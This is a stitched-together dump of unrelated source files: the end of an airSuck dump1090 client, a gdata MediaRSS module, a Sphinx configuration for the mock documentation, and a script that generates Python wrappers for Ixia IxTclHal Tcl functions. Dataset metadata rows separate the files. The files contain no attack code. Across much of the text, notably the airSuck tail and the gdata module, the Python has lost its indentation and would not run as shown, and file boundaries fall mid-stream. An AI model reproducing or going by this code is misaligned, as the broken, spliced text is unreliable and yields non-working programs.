# Dump an error since the OS reported dump1090 can't run.
logger.log("Unable to start dump1090. Please ensure dump1090 is at %s." %asConfig['dump1090Path'])
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Flag the thread for death.
keepRunning = False
# Attempt to kill dump1090
self.__kill1090()
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Attempt to kill dump1090
self.__kill1090()
try:
# Wait 0.1 seconds before looping.
time.sleep(0.1)
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running since we were killed.
keepRunning = False
# Raise the exception again.
raise SystemExit
def __exitHandler(self, x=None, y=None):
"""
When we're instructed to exit these are the things we should do.
"""
logger.log("Caught signal that wants us to die.")
try:
# Try to kill dump1090.
self.__kill1090()
except:
pass
# Raise this exception to kill the program nicely.
sys.exit(0)
def run(self):
logger.log("Starting dump1090 worker.")
# NOTE:
		# dump1090 has a bad habit of not dying on its own, so we install
		# handlers for the signals that result in the death of the client.
try:
signal.signal(signal.SIGTERM, self.__exitHandler)
except:
tb = traceback.format_exc()
logger.log("Death signal handler blew up setting signal handlers:\n%s" %tb)
try:
# Attempt to start the worker.
self.__worker()
except KeyboardInterrupt:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the keyboard interrupt up the chain to our main execution
raise KeyboardInterrupt
except SystemExit:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise SystemExit
except Exception as e:
# Make damn sure dump1090 is dead.
try:
self.__kill1090()
except:
pass
# Pass the exception up the stack.
raise e
#######################
# Main execution body #
#######################
if __name__ == "__main__":
# Set up our global logger.
logger = asLog(asConfig['logMode'])
# Log startup message.
logger.log("Starting the airSuck client...")
# If we're debugging...
if asConfig['debug']:
# Dump our config.
logger.log("Configuration:\n%s" %asConfig)
# Set up our global objects.
asc = airSuckClient()
clientQ = Queue.Queue()
# Do we have at least one data source configured?
noDS = True
try:
	# If we are configured to run the dump1090 client, note that we have a data source.
if asConfig['dump1090Enabled']:
# Set the data source config flag.
noDS = False
	# If we are configured to run the AIS client, note that we have a data source.
if asConfig['aisEnabled']:
# Set the data source config flag.
noDS = False
# Start our comms thread.
	threadClient = threading.Thread(target=asc.run)
threadClient.daemon = True
threadClient.start()
# If we didn't have a configured data source dump a helpful message.
if noDS:
logger.log("No data sources enabled for the airSuck client. Please enable at least one source in config.py by setting dump1090Enabled and/or aisEnabled to True.")
except KeyboardInterrupt:
logger.log("Keyboard interrupt.")
except SystemExit:
logger.log("System exit.")
except:
tb = traceback.format_exc()
logger.log("Unhandled exception in airSuck client:\n%s" %tb)
logger.log("Shutting down the airSuck client.") | gpl-3.0 | 5,499,725,881,586,714,000 | 34.382504 | 193 | 0.47616 | false |
bhargav2408/python-for-android | python-build/python-libs/gdata/src/gdata/media/__init__.py | 221 | 12093 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.media, implementing parts of the MediaRSS spec in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Essential attributes of photos in Google Photos/Picasa Web Albums are
expressed using elements from the `media' namespace, defined in the
MediaRSS specification[1].
Due to copyright issues, the elements herein are documented sparingly, please
consult with the Google Photos API Reference Guide[2], alternatively the
official MediaRSS specification[1] for details.
(If there is a version conflict between the two sources, stick to the
Google Photos API).
[1]: http://search.yahoo.com/mrss (version 1.1.1)
[2]: http://code.google.com/apis/picasaweb/reference.html#media_reference
Keep in mind that Google Photos only uses a subset of the MediaRSS elements
(and some of the attributes are trimmed down, too):
media:content
media:credit
media:description
media:group
media:keywords
media:thumbnail
media:title
"""
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
MEDIA_NAMESPACE = 'http://search.yahoo.com/mrss/'
YOUTUBE_NAMESPACE = 'http://gdata.youtube.com/schemas/2007'
class MediaBaseElement(atom.AtomBase):
"""Base class for elements in the MEDIA_NAMESPACE.
To add new elements, you only need to add the element tag name to self._tag
"""
_tag = ''
_namespace = MEDIA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Content(MediaBaseElement):
"""(attribute container) This element describes the original content,
e.g. an image or a video. There may be multiple Content elements
in a media:Group.
For example, a video may have a
<media:content medium="image"> element that specifies a JPEG
representation of the video, and a <media:content medium="video">
element that specifies the URL of the video itself.
Attributes:
    url: non-ambiguous reference to online object
width: width of the object frame, in pixels
height: width of the object frame, in pixels
medium: one of `image' or `video', allowing the api user to quickly
determine the object's type
type: Internet media Type[1] (a.k.a. mime type) of the object -- a more
verbose way of determining the media type. To set the type member
      in the constructor, use the content_type parameter.
(optional) fileSize: the size of the object, in bytes
[1]: http://en.wikipedia.org/wiki/Internet_media_type
"""
_tag = 'content'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
_attributes['medium'] = 'medium'
_attributes['type'] = 'type'
_attributes['fileSize'] = 'fileSize'
def __init__(self, url=None, width=None, height=None,
medium=None, content_type=None, fileSize=None, format=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
self.medium = medium
self.type = content_type
self.fileSize = fileSize
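# Illustrative sketch (not part of the original library): constructing a
# media:content element for a JPEG rendition might look like the following
# (values are made up):
#   photo = Content(url='http://example.com/photo.jpg', width='1600',
#                   height='1200', medium='image', content_type='image/jpeg')
# ContentFromString() below performs the reverse, parsing XML into a Content.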
def ContentFromString(xml_string):
return atom.CreateClassFromXMLString(Content, xml_string)
class Credit(MediaBaseElement):
"""(string) Contains the nickname of the user who created the content,
e.g. `Liz Bennet'.
This is a user-specified value that should be used when referring to
the user by name.
Note that none of the attributes from the MediaRSS spec are supported.
"""
_tag = 'credit'
def CreditFromString(xml_string):
return atom.CreateClassFromXMLString(Credit, xml_string)
class Description(MediaBaseElement):
"""(string) A description of the media object.
Either plain unicode text, or entity-encoded html (look at the `type'
attribute).
E.g `A set of photographs I took while vacationing in Italy.'
For `api' projections, the description is in plain text;
for `base' projections, the description is in HTML.
Attributes:
    type: either `text' or `html'. To set the type member in the constructor,
use the description_type parameter.
"""
_tag = 'description'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, description_type=None,
extension_elements=None, extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = description_type
def DescriptionFromString(xml_string):
return atom.CreateClassFromXMLString(Description, xml_string)
class Keywords(MediaBaseElement):
"""(string) Lists the tags associated with the entry,
e.g `italy, vacation, sunset'.
Contains a comma-separated list of tags that have been added to the photo, or
all tags that have been added to photos in the album.
"""
_tag = 'keywords'
def KeywordsFromString(xml_string):
return atom.CreateClassFromXMLString(Keywords, xml_string)
class Thumbnail(MediaBaseElement):
"""(attributes) Contains the URL of a thumbnail of a photo or album cover.
There can be multiple <media:thumbnail> elements for a given <media:group>;
for example, a given item may have multiple thumbnails at different sizes.
Photos generally have two thumbnails at different sizes;
albums generally have one cropped thumbnail.
If the thumbsize parameter is set to the initial query, this element points
to thumbnails of the requested sizes; otherwise the thumbnails are the
default thumbnail size.
This element must not be confused with the <gphoto:thumbnail> element.
Attributes:
url: The URL of the thumbnail image.
height: The height of the thumbnail image, in pixels.
width: The width of the thumbnail image, in pixels.
"""
_tag = 'thumbnail'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
_attributes['width'] = 'width'
_attributes['height'] = 'height'
def __init__(self, url=None, width=None, height=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.url = url
self.width = width
self.height = height
def ThumbnailFromString(xml_string):
return atom.CreateClassFromXMLString(Thumbnail, xml_string)
class Title(MediaBaseElement):
"""(string) Contains the title of the entry's media content, in plain text.
Attributes:
type: Always set to plain. To set the type member in the constructor, use
the title_type parameter.
"""
_tag = 'title'
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
def __init__(self, title_type=None,
extension_attributes=None, text=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.type = title_type
def TitleFromString(xml_string):
return atom.CreateClassFromXMLString(Title, xml_string)
class Player(MediaBaseElement):
"""(string) Contains the embeddable player URL for the entry's media content
if the media is a video.
Attributes:
    url: The URL of the embeddable player.
"""
_tag = 'player'
_attributes = atom.AtomBase._attributes.copy()
_attributes['url'] = 'url'
def __init__(self, player_url=None,
extension_attributes=None, extension_elements=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.url= player_url
class Private(atom.AtomBase):
"""The YouTube Private element"""
_tag = 'private'
_namespace = YOUTUBE_NAMESPACE
class Duration(atom.AtomBase):
"""The YouTube Duration element"""
_tag = 'duration'
_namespace = YOUTUBE_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['seconds'] = 'seconds'
class Category(MediaBaseElement):
"""The mediagroup:category element"""
_tag = 'category'
_attributes = atom.AtomBase._attributes.copy()
_attributes['term'] = 'term'
_attributes['scheme'] = 'scheme'
_attributes['label'] = 'label'
def __init__(self, term=None, scheme=None, label=None, text=None,
extension_elements=None, extension_attributes=None):
"""Constructor for Category
Args:
term: str
scheme: str
label: str
      text: str The text data in this element
extension_elements: list A list of ExtensionElement instances
extension_attributes: dict A dictionary of attribute value string pairs
"""
self.term = term
self.scheme = scheme
self.label = label
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Group(MediaBaseElement):
"""Container element for all media elements.
The <media:group> element can appear as a child of an album, photo or
video entry."""
_tag = 'group'
_children = atom.AtomBase._children.copy()
_children['{%s}content' % MEDIA_NAMESPACE] = ('content', [Content,])
_children['{%s}credit' % MEDIA_NAMESPACE] = ('credit', Credit)
_children['{%s}description' % MEDIA_NAMESPACE] = ('description', Description)
_children['{%s}keywords' % MEDIA_NAMESPACE] = ('keywords', Keywords)
_children['{%s}thumbnail' % MEDIA_NAMESPACE] = ('thumbnail', [Thumbnail,])
_children['{%s}title' % MEDIA_NAMESPACE] = ('title', Title)
_children['{%s}category' % MEDIA_NAMESPACE] = ('category', [Category,])
_children['{%s}duration' % YOUTUBE_NAMESPACE] = ('duration', Duration)
_children['{%s}private' % YOUTUBE_NAMESPACE] = ('private', Private)
_children['{%s}player' % MEDIA_NAMESPACE] = ('player', Player)
def __init__(self, content=None, credit=None, description=None, keywords=None,
thumbnail=None, title=None, duration=None, private=None,
category=None, player=None, extension_elements=None,
extension_attributes=None, text=None):
MediaBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.content=content
self.credit=credit
self.description=description
self.keywords=keywords
self.thumbnail=thumbnail or []
self.title=title
self.duration=duration
self.private=private
self.category=category or []
self.player=player
def GroupFromString(xml_string):
return atom.CreateClassFromXMLString(Group, xml_string)
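# Illustrative sketch (not part of the original library): a media:group ties
# the elements above together, e.g. (values are made up):
#   group = Group(title=Title(text='Sunset'),
#                 description=Description(description_type='text',
#                                          text='Taken from the pier'),
#                 keywords=Keywords(text='italy, vacation, sunset'),
#                 content=[Content(url='http://example.com/sunset.jpg',
#                                  medium='image')])
# GroupFromString() parses the equivalent XML back into a Group instance.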
| apache-2.0 | 2,280,272,921,239,872,500 | 33.059155 | 104 | 0.692002 | false |
mikelalcon/bazel | third_party/py/mock/docs/conf.py | 108 | 6310 | # -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
from mock import __version__
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2012, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__[:3]
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False | apache-2.0 | 4,843,835,784,331,451,000 | 29.196172 | 82 | 0.711094 | false |
Luxoft/Twister | lib/Ixia/generate.py | 2 | 15483 | #!/usr/bin/env python
# File: generate.py ; This file is part of Twister.
# version: 2.003
# Copyright (C) 2013 , Luxoft
# Authors:
# Adrian Toader <[email protected]>
# Andrei Costachi <[email protected]>
# Andrei Toma <[email protected]>
# Cristi Constantin <[email protected]>
# Daniel Cioata <[email protected]>
# Mihail Tudoran <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file generates Ixia Library wrapper in Python, using TCL functions from IxTclHal.
Params: - IxOS TCL lib path
- IP address of Ixia chassis
'''
from Tkinter import Tcl
from collections import OrderedDict
import re
import socket
import sys
import os
chassis_ip = '10.100.100.45'
tcl_lib_path = '/home/twister/ixos/ixia/lib/ixTcl1.0'
if len(sys.argv) < 3:
print 'Usage: python generate.py <ixos_tcl_lib_path> <chassis_ip_address>'
exit()
tcl_lib_path = sys.argv[1]
chassis_ip = sys.argv[2]
# some minimal checks on IP address
if chassis_ip.count('.') < 3:
    print 'ERROR: IP address not valid !'
    exit()
try:
socket.inet_aton(chassis_ip)
except socket.error:
print 'ERROR: IP address not valid !'
exit()
# check if IxOS tcl lib path exists
if tcl_lib_path[-1] == '/':
tcl_lib_path = tcl_lib_path.rstrip('/')
if not os.path.isdir(tcl_lib_path):
print 'ERROR: IxOS tcl lib path doesn\'t exists'
exit()
tcl = Tcl()
tcl.eval('package req IxTclHal')
tcl.eval('ixConnectToTclServer ' + chassis_ip)
tcl.eval('ixConnectToChassis ' + chassis_ip)
# # # # # # # #
HEAD = """
from Tkinter import Tcl
t = Tcl()
t.eval('package req IxTclHal')
true = True
false = False
yes = True
no = False
none = None
"""
TAIL = """
def ix_exec(cmd):
# This is used for executing custom TCL commands
r = t.eval(cmd)
return r
if __name__ == "__main__":
chassis_ip = '%s'
funcs = [x[0] for x in locals().items() if callable( x[1] )]
# print sorted(funcs)
print 'Found {} functions!'.format(len(funcs))
print 'Is this UNIX?', isUNIX()
print 'Connect to TCL Server:', ixConnectToTclServer(chassis_ip)
print 'Connect to Chassis', ixConnectToChassis(chassis_ip)
print 'Config chassis...'
portList = ''
chassis('get ' + chassis_ip)
py_chassis = chassis('cget -id')
print py_chassis
print 'Config card...'
py_card = 1
card('setDefault')
card('config -txFrequencyDeviation 0')
print py_card
print 'Config port...'
py_port = 1
port('setFactoryDefaults {} {} {}'.format(py_chassis, py_card, py_port))
port('config -speed 100')
port('config -duplex full')
port('config -flowControl false')
print py_port
print 'Config stat...'
stat('setDefault')
stat('config -mode statNormal')
stat('config -enableValidStats false')
stat('config -enableProtocolServerStats true')
stat('config -enableArpStats true')
stat('config -enablePosExtendedStats true')
stat('config -enableDhcpStats false')
stat('config -enableDhcpV6Stats false')
stat('config -enableEthernetOamStats false')
print 'Done.'
print 'Config flexibleTimestamp...'
flexibleTimestamp('setDefault')
flexibleTimestamp('config -type timestampBeforeCrc')
flexibleTimestamp('config -offset 23')
print 'Done.'
print 'Config filter...'
ix_filter('setDefault')
ix_filter('config -captureTriggerDA anyAddr')
ix_filter('config -captureTriggerSA anyAddr')
ix_filter('config -captureTriggerPattern anyPattern')
ix_filter('config -captureTriggerError errAnyFrame')
print 'Done.'
print 'Config filterPallette...'
filterPallette('setDefault')
filterPallette('config -DA1 "00 00 00 00 00 00"')
filterPallette('config -DAMask1 "00 00 00 00 00 00"')
filterPallette('config -DA2 "00 00 00 00 00 00"')
filterPallette('config -DAMask2 "00 00 00 00 00 00"')
filterPallette('config -SA1 "00 00 00 00 00 00"')
filterPallette('config -SAMask1 "00 00 00 00 00 00"')
filterPallette('config -SA2 "00 00 00 00 00 00"')
filterPallette('config -SAMask2 "00 00 00 00 00 00"')
filterPallette('config -pattern1 "DE ED EF FE AC CA"')
filterPallette('config -patternMask1 "00 00 00 00 00 00"')
print 'Done.'
print 'Config capture...'
capture('setDefault')
capture('config -fullAction lock')
capture('config -sliceSize 8191')
print 'Done.'
print 'Config ipAddressTable...'
ipAddressTable('setDefault')
ipAddressTable('config -defaultGateway "0.0.0.0"')
print 'Done.'
print 'Config arpServer...'
arpServer('setDefault')
arpServer('config -retries 3')
arpServer('config -mode arpGatewayOnly')
arpServer('config -rate 208333')
arpServer('config -requestRepeatCount 3')
print 'Done.'
print 'Config interfaceTable...'
interfaceTable('setDefault')
interfaceTable('config -dhcpV4RequestRate 0')
interfaceTable('config -dhcpV6RequestRate 0')
interfaceTable('config -dhcpV4MaximumOutstandingRequests 100')
interfaceTable('config -dhcpV6MaximumOutstandingRequests 100')
#interfaceTable('config -fcoeRequestRate 500')
print 'Done.'
print 'Clear All Interfaces ...'
interfaceTable('clearAllInterfaces')
print 'Done.'
print 'Config protocolServer...'
protocolServer('setDefault')
protocolServer('config -enableArpResponse true')
protocolServer('config -enablePingResponse false')
print 'Done.'
print 'Config oamPort...'
oamPort('setDefault')
oamPort('config -enable false')
oamPort('config -macAddress "00 00 AB BA DE AD"')
oamPort('config -enableLoopback false')
oamPort('config -enableLinkEvents false')
print 'Done.'
print 'Call ixWritePortsToHardware and ixCheckLinkState ...'
# lappend portList [list $chassis $card $port] # ???
ixWritePortsToHardware(portList, None)
ixCheckLinkState(portList)
print 'Done.'
#
""" % (chassis_ip)
# # # # # # # #
def tcl_convert(variable):
"""
This returns the TCL value converted into Pyton string repr.
alnum
Any Unicode alphabet or digit character.
alpha
Any Unicode alphabet character.
ascii
Any character with a value less than \u0080 (those that are in the 7-bit ascii range).
boolean
Any of the forms allowed to Tcl_GetBoolean.
In the case of boolean, true and false, if the function will return 0, then the varname will always be set to 0,
due to the varied nature of a valid boolean value.
control
Any Unicode control character.
digit
Any Unicode digit character. Note that this includes characters outside of the [0-9] range.
double
Any of the valid forms for a double in Tcl, with optional surrounding \
whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
false
Any of the forms allowed to Tcl_GetBoolean where the value is false.
graph
Any Unicode printing character, except space.
integer
Any of the valid forms for an ordinary integer in Tcl, with optional \
surrounding whitespace. In case of under/overflow in the value,
0 is returned and the varname will contain -1.
lower
Any Unicode lower case alphabet character.
print
Any Unicode printing character, including space.
punct
Any Unicode punctuation character.
space
Any Unicode space character.
true
Any of the forms allowed to Tcl_GetBoolean where the value is true.
upper
Any upper case alphabet character in the Unicode character set.
wordchar
Any Unicode word character. That is any alphanumeric character, and \
any Unicode connector punctuation characters (e.g. underscore).
xdigit
Any hexadecimal digit character ([0-9A-Fa-f]).
"""
global tcl
types = OrderedDict([
['integer', int],
['digit', int],
['double', float],
['true', bool],
['false', bool],
['boolean', bool],
['xdigit', str],
['alnum', str],
['alpha', str],
['ascii', str],
['control', str],
['graph', str],
['lower', str],
['print', str],
['punct', str],
['space', str],
['upper', str],
['wordchar', str],
])
for tcl_type, py_type in types.iteritems():
found = tcl.eval("string is {} -strict ${}".format(tcl_type, variable))
found = int(found)
if found:
value = tcl.getvar('vDefaultArg')
value = str(value)
print 'Converting value `{}` into TCL type `{}`.'.format(value, tcl_type)
if value == 'false' or value == 'no':
return False
elif py_type == str:
return '"{}"'.format(value)
else:
return value
return '!!!'
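# Illustrative sketch (not part of the original script): given a Tcl variable
# name, tcl_convert() returns a Python-source representation of its value, e.g.
#   "5"     -> 5            (matches the Tcl 'integer'/'digit' classes)
#   "1.5"   -> 1.5          (matches 'double')
#   "false" -> False        ('false'/'no' map to Python False)
#   "cable" -> '"cable"'    (string classes are wrapped in quotes)
# and the sentinel '!!!' if no Tcl string class matched.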
# # # # # # # #
IX_VARS = {
'from': 'ix_from',
'for': 'ix_for',
'while': 'ix_while',
'file': 'ix_file',
'object': 'ix_object',
'range': 'ix_range',
'map': 'ix_map',
'filter': 'ix_filter',
}
def fix_tcl_var(variable):
""" replace TCL variable """
global IX_VARS
if variable in IX_VARS:
return IX_VARS[variable]
return variable
def fix_tcl_func(func):
""" change TCL function """
global IX_VARS
func = func.replace('::', '_')
if func in IX_VARS:
return IX_VARS[func]
return func
# # # # # # # #
'''
Get Ixia library version from ixTclHal.tcl file
'''
ixos_version = ''
version_file = tcl_lib_path + '/ixTclHal.tcl'
try:
with open(version_file, 'r') as v_file:
for line in v_file:
if line.startswith('package provide IxTclHal'):
ixos_version = line.split()[-1]
break
except:
print 'ERROR: Cannot get IxOS version. Exiting !'
exit()
# # # # # # # #
'''
Generate functions.txt file from file tclIndex
'''
FUNCTIONS = []
tcl_index_file = tcl_lib_path + '/tclIndex'
try:
for line in open(tcl_index_file).readlines():
if line.startswith('set auto_index(', 0):
line = line.replace('set auto_index(','')
FUNCTIONS.append(line.split(')')[0])
except:
pass
# # # # # # # #
'''
Update functions.txt file from file ixTclSetup.tcl
'''
ix_tcl_setup = tcl_lib_path + '/ixTclSetup.tcl'
try:
file_content = open(ix_tcl_setup, 'r').read()
# get entries from ixTclHal::noArgList
no_arg_list = re.findall('set ixTclHal::noArgList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(no_arg_list[0][1].replace('\\','').split())
# get entries from ixTclHal::pointerList
pointer_list = re.findall('set ixTclHal::pointerList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(pointer_list[0][1].replace('\\','').split())
# get entries from ixTclHal::command
command_list = re.findall('set ixTclHal::commandList(.*?)\{(.+?)\}',file_content, re.M | re.S)
FUNCTIONS.extend(command_list[0][1].replace('\\','').split())
except:
pass
try:
with open('functions.txt', 'w') as OUTPUT:
OUTPUT.write('\n'.join(FUNCTIONS))
except:
pass
# # # # # # # #
FUNCTIONS = []
for line in open('functions.txt').readlines():
if not line.strip():
continue
if '::' in line:
continue
func_name = line.strip() # TCL Function name
tcl_args = []
tcl_args_long = []
pyc_args = []
pyc_args_long = []
    tmpl = '# Function `{}` is invalid'.format(func_name) # Default string, says the func is invalid
tcl.eval('set vDefaultArg ""')
defaultArgFound = False
defaultArgs = [] # The list of mandatory arguments
try:
        # Enable TCL Function. RISK: this executes the function!
try:
tcl.eval(func_name)
except:
pass
proc_args = tcl.eval('info args ' + func_name)
for arg in proc_args.split():
has_default = tcl.eval('info default %s %s vDefaultArg' % (func_name, arg))
arg_fixed = fix_tcl_var(arg)
# Args for executing
tcl_args.append(arg)
# Args for calling the TCL function
pyc_args.append(arg_fixed)
# If this argument has a default value
if int(has_default) and tcl.getvar('vDefaultArg'):
defaultArgFound = True
# Args for comment
tcl_args_long.append('%s {%s}' % (arg, str(tcl.getvar('vDefaultArg'))))
# Args for defining Python functions
pyc_args_long.append('%s=%s' % (arg_fixed, str(tcl_convert('vDefaultArg'))))
else:
tcl_args_long.append(arg)
if not defaultArgFound:
pyc_args_long.append(arg_fixed)
else:
defaultArgs.append(arg_fixed)
pyc_args_long.append('%s=None' % (arg_fixed))
# Reset variable for the next cycle
tcl.eval('set vDefaultArg ""')
leng = len(tcl_args)
tcl_args = ', '.join(tcl_args)
tcl_args_long = ' '.join(tcl_args_long)
pyc_args = ', '.join(pyc_args)
pyc_args_long = ', '.join(pyc_args_long)
    except Exception as e:
print('>>> Cannot create function `{}`, exception: `{}`!\n'.format(func_name, e))
continue
if defaultArgs:
defaultArgs = '\n'.join([ ' if {0} is None: print "TCL argument ' \
' `{0}` cannot be empty!"; return False'.format(x) for x in defaultArgs ])
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l}
{def_arg}\n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng, def_arg=defaultArgs)
else:
tmpl = """
def {py}({py_arg_l}):
'''\n Method Name : {tcl}\n Arguments : {tcl_arg_l} \n '''
r = t.eval("{tcl} {le}".format({py_arg}))
return r
""".format(py=fix_tcl_func(func_name), tcl=func_name, py_arg=pyc_args, py_arg_l=pyc_args_long,
tcl_arg=tcl_args, tcl_arg_l=tcl_args_long, le='{} '*leng)
FUNCTIONS.append(tmpl)
#
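# Illustrative sketch (not part of the original script): for a Tcl proc such as
# "port" taking a single argument, the templates above emit roughly the
# following wrapper (the actual argument names depend on the installed IxOS
# library):
#
#   def port(cmd):
#       '''
#       Method Name : port
#       Arguments : cmd
#       '''
#       r = t.eval("port {} ".format(cmd))
#       return r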
